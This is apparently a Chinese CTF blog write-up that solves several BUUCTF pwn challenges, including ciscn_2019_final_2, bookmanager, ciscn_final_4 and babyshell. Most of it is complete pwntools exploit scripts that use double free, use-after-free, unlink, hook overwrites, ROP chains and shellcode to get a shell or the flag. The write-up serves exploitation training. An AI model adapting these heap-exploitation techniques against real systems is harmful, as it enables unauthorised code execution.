BUUCTF-pwn(13)

wustctf2020_number_game

此时运用我们的计算机底层的知识，可知，计算机底层储存形式为补码！
-2147483648的补码形式为0x80000000，它取反加一之后仍然是0x80000000，因此这边输入-2147483648

---

护网杯_2018_gettingstart

此时又要用到我们的数学知识！
转换浮点数工具

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './2018_gettingStart'
r = remote('node4.buuoj.cn',29971)
elf = ELF(binary)

payload = b'a'*0x18+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A)
sleep(0.3)
r.sendline(payload)
r.interactive()

---

ciscn_2019_final_2

分析主要函数！

Allocate申请函数！

Free释放函数！

Show打印函数！

Exit退出函数！

本题设计IO，故进行细致分析，大致思路为采用UAF漏洞，打印出libc等低地址，进而计算出偏差，重写低地址，修改fd指向stdin+0x70位置，设置为666，进行输入操作！

Allocate()
Free()
Allocate(2)
Allocate(2)
Allocate(2)
Allocate(2)
Free(2)
Allocate()
Free(2)
heap_low_addr = Show(2)
此时通过连续Free(2)达成tcache的double free，需注意Free之间需要Allocate申请一次，设置bool为1即可释放！

Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(0x91))

for i in range(7):
[Tab] Free(1)#tcache填充
[Tab] Allocate(2)
Free(1)
main_arena_low = Show(1)-96
stdin_low = (main_arena_low-0x10+(libc.symbols[‘IO_2_1_stdin’]-libc.symbols[’__malloc_hook’]))
此时填充tcache[0x90]，并泄露出libc上低4位字节，可以计算出_IO_2_1_stdin_与__malloc_hook的偏移量！

Allocate(1,str(stdin_low+0x70))#对已存在的libc的低地址进行覆写
Allocate()
Free(1)
Allocate(2)
Free(1)
new_heap_addr = Show(1)#泄露出heap上低4位字节
此时重复泄露出heap上的低4位字节，为接下来的修改fd指针作准备！

Allocate(1,str(new_heap_addr-0x30))
Allocate(1,str(new_heap_addr-0x30))
Allocate(1)
Allocate(1,str(666))
此时重新对tcache的fb指针进行布局！重写_fileno(_fileno 返回文件描述符)

由上一系列的流程进而可以得到flag

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './ciscn_final_2'
r = remote('node4.buuoj.cn',25631)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.27.so')
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
def Allocate(choice=1,payload='1\n'):
    r.sendlineafter("which command?\n> ",'1')
    r.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(choice))
    r.sendafter("your inode number:",payload)

def Free(choice=1):
    r.sendlineafter("which command?\n> ",'2')
    r.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(choice))

def Show(choice=1):
    r.sendlineafter("which command?\n> ",'3')
    r.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(choice))
    r.recvuntil("number :")
    if choice==1:
        return int(r.recvuntil('\n')[:-1],10)&0xffffffff
    else:
        return int(r.recvuntil('\n')[:-1],10)&0xffff

def Exit():
    r.sendlineafter("which command?\n> ",'4')
    

Allocate()
Free()
Allocate(2)
Allocate(2)
Allocate(2)
Allocate(2)
Free(2)

Allocate()
Free(2)
heap_low_addr = Show(2)

Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(0x91))
for i in range(7):
    Free(1)#tcache
    Allocate(2)
Free(1)
#gdb.attach(r)
main_arena_low = Show(1)-96
stdin_low = (main_arena_low-0x10+(libc.symbols['_IO_2_1_stdin_']-libc.symbols['__malloc_hook']))

Allocate(1,str(stdin_low+0x70))
Allocate()
Free(1)
Allocate(2)
Free(1)
new_heap_addr = Show(1)

Allocate(1,str(new_heap_addr-0x30))
Allocate(1,str(new_heap_addr-0x30))
Allocate(1)
Allocate(1,str(666))
success(hex(new_heap_addr))
success(hex(main_arena_low))
success(hex(stdin_low))
#gdb.attach(r)
Exit()

r.interactive()

---

[OGeek2019]bookmanager

函数过程较为复杂，其实较为多，不仔细分析了，使用Unlink手法进行攻击__free_hook，经过多次尝试发现__malloc_hook或__realloc_hook无法获取权限，故对__free_hook进行覆写。
本题难度主要是对函数进行分析.攻击手法难度较低！

位于Edit函数存在堆溢出漏洞！

from unittest.main import main
from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './pwn'
#r = process(binary)
r = remote('node4.buuoj.cn',27418)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
def start():
    r.sendlineafter("create: ",'njh')

def Allocate(chapterName='ab\n'):
    r.sendlineafter("Your choice:",'1')
    r.sendlineafter("Chapter name:",chapterName)

def AllocateSect(chapterName,sectionName):
    r.sendlineafter("Your choice:",'2')
    r.sendlineafter("add into:",str(chapterName))
    r.recvuntil("0x")
    addr = int(r.recvline()[:-1],16)
    r.sendlineafter("Section name:",str(sectionName))
    return addr

def AllocateText(sectionName,size=0x18,payload='\n'):
    r.sendlineafter("Your choice:",'3')
    r.sendlineafter("add into:",str(sectionName))
    r.sendlineafter("write:",str(size))
    r.sendlineafter("Text:",payload)

def Free(chapterName):
    r.sendlineafter("Your choice:",'4')
    r.sendlineafter("Chapter name:",str(chapterName))

def FreeSect(sectionName):
    r.sendlineafter("Your choice:",'5')
    r.sendlineafter("Section name:",str(sectionName))

def FreeText(sectionName):
    r.sendlineafter("Your choice:",'6')
    r.sendlineafter("Section name:",str(sectionName))

def Book():
    r.sendlineafter("Your choice:",'7')

def Edit(choice,new,sectionName=''):
    r.sendlineafter("Your choice:",'8')
    if choice == 1:
        r.sendlineafter("(Chapter/Section/Text):",'Chapter')
        r.sendlineafter("Chapter name:",new)
    elif choice == 2:
        r.sendlineafter("(Chapter/Section/Text):",'Section')
        r.sendlineafter("New Section name:",new)
    else:
        r.sendlineafter("(Chapter/Section/Text):",'Text')
        r.sendlineafter("Section name:",str(sectionName))
        r.sendlineafter("New Text:",new)

sectionaddr = []
start()
Allocate('/bin/sh')
target = AllocateSect('/bin/sh','1')+0x20
AllocateSect('/bin/sh','2')
AllocateSect('/bin/sh','3')

fd = target-0x18
bk = target-0x10
AllocateText('1',0x88)
AllocateText('2',0x88)
AllocateText('3')
AllocateText('3')
AllocateText('3',0x18,b'/bin/sh\x00')

Edit(3,p64(0)+p64(0x81)+p64(fd)+p64(bk)+12*p64(0)+p64(0x80)+p64(0x90),'1')
FreeText('2')
AllocateText('2',0x70,b'a'*8)
Book()
r.recvuntil(b'aaaaaaaa')
main_arena = u64(r.recv(6).ljust(8,b'\x00'))-344
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']
one = [0x45206,0x4525a,0xef9f4,0xf0897]

Edit(3,b'a'*0x18+p64(libc_base+libc.symbols['__free_hook']),'1')
Edit(3,p64(libc_base+libc.symbols['system']),'1')
success(hex(target))
success(hex(main_arena))
#gdb.attach(r)
Free('/bin/sh')

r.interactive()

---

ciscn_2019_final_4

House of Spirit
该ELF存在反调试，故我们利用ida进行patch！


经过分析主要函数！发现仅仅存在UAF漏洞，不存在其它漏洞，没有Edit编辑函数。
发现采用覆写__malloc_hook的方法失效，故此时我们采用覆写到栈地址上，覆写rip！


本题脚本较大(臃肿)，但分步来分析的话相对比较简单！

start()
Allocate(0x88)#0
Allocate()#1
Free(0)
Show(0)
main_arena = u64(r.recvuntil(’\x7f’)[-6:].ljust(8,b’\x00’))-88
libc_base = main_arena-0x10-libc.symbols[’__malloc_hook’]
malloc_hook = libc_base+libc.symbols[’__malloc_hook’]
realloc = libc_base+libc.symbols[’__libc_realloc’]
environ_addr = libc_base+libc.symbols[‘environ’]
首先我们通过unsorted bin特性泄露出libc基地址


Allocate(0x88)#2 leak libc
Allocate(0x78)#3
Allocate(0x78)#4
Allocate()#5
Allocate(0x88)#6
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(note_addr-0x70))#7
Allocate(0x78)#8
Allocate(0x78)#9
Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10
Show(0)# leak stack
stack_addr = u64(r.recvuntil(b’\x7f’)[-6:].ljust(8,b’\x00’))-0x210
read_addr = libc_base+libc.symbols[‘read’]
此时我们利用double free漏洞得到bss段上的全局变量的chunk，从而修改全局变量来泄露environ内容得到栈地址！

此时能够泄露出栈地址！
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(stack_addr))#11
Allocate(0x78)#12
Allocate(0x78)#13
payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b’\n’
Allocate(0x78,payload)#14
此时再次利用double free能够申请得到栈上地址，并写入ROP，此时我们覆写malloc_hook为add rsp;ret即可抬升rsp，并且执行ROP，此时我们能往里面进行写入0x1000大小内容，完成orw！


Allocate(0x68)#15
Allocate(0x68)#16
Allocate()#17
Free(15)
Free(16)
Free(15)
Allocate(0x68,p64(malloc_hook-0x23))
Allocate(0x68)
Allocate(0x68)
Allocate(0x68,b’a’*0x13+p64(libc_base+add_rsp48))
r.sendlineafter(">> ",‘1’)
r.sendlineafter(“size?”,‘10’)
flag = stack_addr+0xd8
payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols[‘openat’]+libc_base)
payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr)
payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols[‘puts’]+libc_base)+b’/flag\x00\x00\x00’
sleep(0.1)
r.send(payload)

此时我们利用该流程，便可以得到flag！

from pwn import *
context(os='linux',arch='amd64',log_level='debug')

binary = './ciscn_final_4'
r = remote('node4.buuoj.cn',28544)
#r = process(binary)
elf = ELF(binary)
libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
libc = ELF('./libc-2.23.so')
pop_rsi_ret = 0x0202e8#0x0202e8
pop_rdi_ret = 0x021102#0x021102
pop_rdx_ret = 0x001b92#0x001b92
add_rsp48 = 0x00c9f81#0x00c9551
note_addr = 0x06020C0
def start():
    r.sendlineafter("what is your name? ",p64(0x81)+b'njh')

def Allocate(size=0x18,payload='\n'):
    r.sendlineafter(">> ",'1')
    r.sendlineafter("size?",str(size))
    r.sendafter("content?",payload)

def Free(index):
    r.sendlineafter(">> ",'2')
    r.sendlineafter("index ?",str(index))

def Show(index):
    r.sendlineafter(">> ",'3')
    r.sendlineafter("index ?",str(index))

start()
Allocate(0x88)#0
Allocate()#1
Free(0)
Show(0)
main_arena = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
malloc_hook = libc_base+libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']
environ_addr = libc_base+libc.symbols['environ']

Allocate(0x88)#2 leak libc

Allocate(0x78)#3
Allocate(0x78)#4
Allocate()#5
Allocate(0x88)#6

Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(note_addr-0x70))#7
Allocate(0x78)#8
Allocate(0x78)#9
Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10
Show(0)# leak stack
stack_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x210
read_addr = libc_base+libc.symbols['read']

Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(stack_addr))#11
Allocate(0x78)#12
Allocate(0x78)#13
payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b'\n'
Allocate(0x78,payload)#14

Allocate(0x68)#15
Allocate(0x68)#16
Allocate()#17
Free(15)
Free(16)
Free(15)
Allocate(0x68,p64(malloc_hook-0x23))
Allocate(0x68)
Allocate(0x68)
Allocate(0x68,b'a'*0x13+p64(libc_base+add_rsp48))

success(hex(note_addr))
success(hex(main_arena))
success(hex(environ_addr))
success(hex(stack_addr))
#gdb.attach(r,'b *0x0000000000400B2C')
r.sendlineafter(">> ",'1')
r.sendlineafter("size?",'10')
flag = stack_addr+0xd8
payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols['openat']+libc_base)
payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr)
payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols['puts']+libc_base)+b'/flag\x00\x00\x00'
sleep(0.1)
r.send(payload)


r.interactive()

---

starctf_2019_babyshell

逻辑比较简单！

check函数检测shellcode是否匹配data段上的一串数据，如下

此时我们只要输入的shellcode从其中选择即可！


此时我们选择调整rdi与rdx的值，并且调用syscall进行sys_read，并输入sh执行函数！
或者我们可以利用\x00跳出循环比较，从而执行sh函数！如’\x00J’+’\x00’ 或 ‘\x00B3’

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './starctf_2019_babyshell'
r = remote('node4.buuoj.cn',27400)
#r = process(binary)
elf = ELF(binary)

#gdb.attach(r,'b *0x004008C6')
r.recvuntil("give me shellcode, plz:")
payload = asm('pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdi;syscall')
r.send(payload)
sleep(0.1)
r.send(b'a'*0xc+asm(shellcraft.sh()))

r.interactive()

---

wustctf2020_easyfast

简单的double

简单的UAF堆题目！

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './wustctf2020_easyfast'
r = remote('node4.buuoj.cn',26675)
#r = process(binary)
elf = ELF(binary)
libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
shell_addr = 0x0602090
def Allocate(size=0x18):
    r.sendlineafter("choice>\n",'1')
    r.sendlineafter("size>\n",str(size))

def Free(index):
    r.sendlineafter("choice>\n",'2')
    r.sendlineafter("index>\n",str(index))

def Edit(index,payload='\n'):
    r.sendlineafter("choice>\n",'3')
    r.sendlineafter("index>\n",str(index))
    r.send(payload)

def Shell():
    r.sendlineafter("choice>\n",'4')

Allocate(0x48)#0
Allocate(0x48)#1
Free(0)
Edit(0,p64(shell_addr-0x10))

Allocate(0x48)#2
Allocate(0x48)#3
Edit(3,p64(0))
success(hex(shell_addr))
#gdb.attach(r)
Shell()

r.interactive()

---

wustctf2020_name_your_dog

存在局限的任意地址写漏洞，较为简单！

经过计算可以修改scanf@got为后门函数地址！

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './wustctf2020_name_your_dog'
r = remote('node4.buuoj.cn',27072)
#r = process(binary)
elf = ELF(binary)
shell_addr = 0x080485CB
dogs = 0x0804A060

def nameWhich(offset,payload):
    r.sendlineafter("Name for which?\n>",str(offset))
    r.sendlineafter("Give your name plz: ",payload)

nameWhich('-7',p64(shell_addr))

r.interactive()

---

ciscn_2019_en_3

该文件出现了FORTIFY保护！

本题较为简单，2.27的double free，本意想要采用house of sprite！但是经过实践该方法复杂且无法绕过canary。故还是老老实实采用double free最简单的方式来获取权限！

from pwn import *
context(os='linux',arch='amd64',log_level='debug')

binary = './ciscn_2019_en_3'
r = remote('node4.buuoj.cn',26765)
#r = process(binary)
elf = ELF(binary)
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
libc = ELF('./libc-2.27.so')
def Allocate(size=0x18,payload='\n'):
    r.sendlineafter("Input your choice:",'1')
    r.sendlineafter("story: ",str(size))
    r.sendafter("story: ",payload)

def Free(index):
    r.sendlineafter("Input your choice:",'4')
    r.sendlineafter("Please input the index:",str(index))


#gdb.attach(r)
r.sendlineafter("What's your name?",'%p%p%p%p.%p,%p%p%p%p%p%p%p.%p,')
r.recvuntil(".0x")
libc_base = int(r.recv(12),16)-libc.symbols['_IO_file_jumps']
r.recvuntil(".0x")
stack_addr = int(r.recv(12),16)-0x138
free_hook = libc_base+libc.symbols['__free_hook']
system = libc_base+libc.symbols['system']
success("stack_addr -> "+hex(stack_addr))
success("libc_base -> "+hex(libc_base))
r.sendafter("Please input your ID.",p64(0x71))

Allocate()#0
Allocate(0x18,b'/bin/sh\x00')#1
Free(0)
Free(0)
Allocate(0x18,p64(free_hook))
Allocate()#2
Allocate(0x18,p64(system))
success(hex(free_hook))
#gdb.attach(r)
Free(1)


r.interactive()

---